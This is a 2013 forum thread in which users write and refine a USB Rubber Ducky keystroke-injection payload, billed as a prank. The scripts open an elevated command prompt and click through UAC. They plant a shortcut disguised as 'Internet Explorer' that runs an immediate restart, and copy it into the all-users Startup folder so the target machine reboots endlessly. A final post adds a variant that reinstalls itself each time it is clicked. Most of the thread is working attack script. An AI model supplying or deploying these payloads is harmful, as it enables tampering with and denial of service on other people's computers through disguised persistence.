Forgiven Posted November 23, 2013 Posted November 23, 2013 (edited) There's a pretty funny prank that many of you may already know about, that would be cool to turn into a USB Rubber Ducky prank attack. The concept is based upon creating an infinite boot loop in the target windows system. The physical access method for creating the attack without a ducky is described on this YouTube video. Essentially the command sequence: shutdown -r -t 10 -c "Your Message Here" Is created as a shortcut and saved into the startup folder so that when the victim turns off and then restarts their machine, it goes through an annoying reboot loop. It was hidden in the video as a shortcut named Internet Explorer and having the icon to match....clever. The prank is harmless since simply holding down the SHIFT key can cease implementation of startup folder actions to allow the victim to clear the shortcut script from their STARTUP folder. Being able to use the power of the Mighty Rubber Ducky to quickly automate the prank on a target would be cool. Having the Duck do the prank via Powershell would be nice. That's the concept...I'm off to make a stab at my first ducky payload. If you beat me to it, please share your results. Edited November 23, 2013 by Forgiven Quote
Forgiven Posted November 23, 2013 Author Posted November 23, 2013 MODS - DELETE THIS.....I just saw a payload exists for shutdown. Thanks. Quote
overwraith Posted November 23, 2013 Posted November 23, 2013 (edited) Here is what I knocked out in about 5 min. Delete post if you must. REM *** Remove all internet explorer icons from the desktop. *** REM *** Navigate to the desktop. *** GUI D REM *** Select the menu button for a context menu. *** MENU REM *** Select the 'New' menu option. STRING w REM *** Select the shortcut option. *** STRING s REM *** Now the magic shutdown string. *** STRING shutdown -r -t 10 -c "You have been owned!" REM *** Select next button. *** ALT N REM *** Type in the shortcut name. *** STRING Internet Explorer REM *** Finish creating the shortcut. *** ALT F REM *** Select the shutdown executable from the desktop by typing it's name. *** GUI D STRING Internet Explorer REM *** Pull up a context menu on the rogue shortcut. *** MENU REM *** Select 'properties' from the context menu. *** STRING r REM *** Select change icons button. *** ALT C REM *** Say ok to the popup box. *** ENTER REM *** You have to manually set the icon from here. *** If you need something that will set the icon without user interaction, you could hijack the internet explorer icon that is already put on the desktop. Edited November 23, 2013 by overwraith Quote
overwraith Posted November 23, 2013 Posted November 23, 2013 Got another script, but is not working correctly. Need to add some delays. REM Author: overwraith based on 'Angry ginger kid hack' REM Name: InfiniteBoot.txt REM Purpose: A prank that makes a computer infinitely restart. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Remove all internet explorer icons from the desktop. *** REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to the desktop. *** STRING cd cd %homepath%\Desktop ENTER REM *** Remove the icons. *** STRING erase /Q "Internet Explorer*.lnk" ENTER REM *** Exit the command prompt. *** STRING EXIT ENTER REM *** Navigate to the desktop. *** GUI D REM *** Select the menu button for a context menu. *** MENU REM *** Select the 'New' menu option. STRING w REM *** Select the shortcut option. *** STRING s REM *** Now the magic shutdown string. *** STRING shutdown -r -t 10 -c "You have been owned!" REM *** Select next button. *** ALT N REM *** Type in the shortcut name. *** STRING Internet Explorer REM *** Finish creating the shortcut. *** ALT F REM *** Copy the shortcut file to the startup folder. *** REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to the desktop. *** STRING cd cd %homepath%\Desktop ENTER REM *** Copy the link on the desktop to the startup folder. *** STRING copy /Y /L Internet Explorer*.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER REM *** Exit the command prompt. *** STRING EXIT ENTER REM *** Saving the manual link icon selection until the end of the script. REM *** Select the shutdown executable from the desktop by typing it's name. *** GUI D STRING Internet Explorer REM *** Pull up a context menu on the rogue shortcut. *** MENU REM *** Select 'properties' from the context menu. *** STRING r REM *** Select change icons button. *** ALT C REM *** Say ok to the popup box. *** ENTER REM *** You have to manually set the icon from here. *** Quote
overwraith Posted November 24, 2013 Posted November 24, 2013 (edited) Ok, this script appears to work. May have to tweak the delays depending on the processing power of your system. If you do find yourself in a situation where you need to tweak the delays, break it up into procedures, and execute them one at a time. The first command window is procedure 1, making the shortcut is procedure 2, the second command window is procedure 3, and selecting the icon is procedure 4. REM Author: overwraith based on 'Angry ginger kid hack' REM Name: InfiniteBoot.txt REM Purpose: A prank that makes a computer infinitely restart. REM Encoder V2.4+ DEFAULT_DELAY 50 REM *** Initial Delay *** DELAY 2000 GUI D REM *** Remove all internet explorer icons from the desktop. *** REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to the desktop. *** STRING cd %homepath%\Desktop ENTER REM *** Remove the icons. *** STRING erase /Q "Internet Explorer*.lnk" ENTER DELAY 500 REM *** Exit the command prompt. *** STRING EXIT ENTER DELAY 750 REM *** Navigate to the desktop. *** GUI D DELAY 750 REM *** Select the menu button for a context menu. *** MENU REM *** Select the 'New' menu option. STRING w REM *** Select the shortcut option. *** STRING s DELAY 2000 REM *** Now the magic shutdown string. *** STRING shutdown -r -t 10 -c "You have been owned!" REM *** Select next button. *** ALT N DELAY 1000 REM *** Type in the shortcut name. *** STRING Internet Explorer DELAY 750 REM *** Finish creating the shortcut. *** ALT F DELAY 1000 REM *** Copy the shortcut file to the startup folder. *** REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to the desktop. *** STRING cd %homepath%\Desktop ENTER DELAY 250 REM *** Copy the link on the desktop to the startup folder. *** STRING xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" ENTER DELAY 750 REM *** Exit the command prompt. *** STRING EXIT ENTER DELAY 1000 REM *** Saving the manual link icon selection until the end of the script. REM *** Select the shutdown executable from the desktop by typing it's name. *** GUI D STRING Internet Explorer DELAY 250 REM *** Pull up a context menu on the rogue shortcut. *** MENU DELAY 250 REM *** Select 'properties' from the context menu. *** STRING R DELAY 250 REM *** Select change icons button. *** ALT C REM *** Say ok to the popup box. *** ENTER REM *** You have to manually set the icon from here. *** If you do shoot yourself in the foot with this script, boot into safe mode, and delete the file in the startup folder. Edited November 24, 2013 by overwraith Quote
overwraith Posted November 24, 2013 Posted November 24, 2013 And since the shutdown command is just batch the following should be able to perpetuate the problem even after the shortcut is deleted from the start up folder. xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & shutdown -r -t 10 -c "You have been owned!" have not tried it yet, but I have no reason to think it shouldn't work. So every time the user clicks on the shortcut it should copy to the startup folder. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.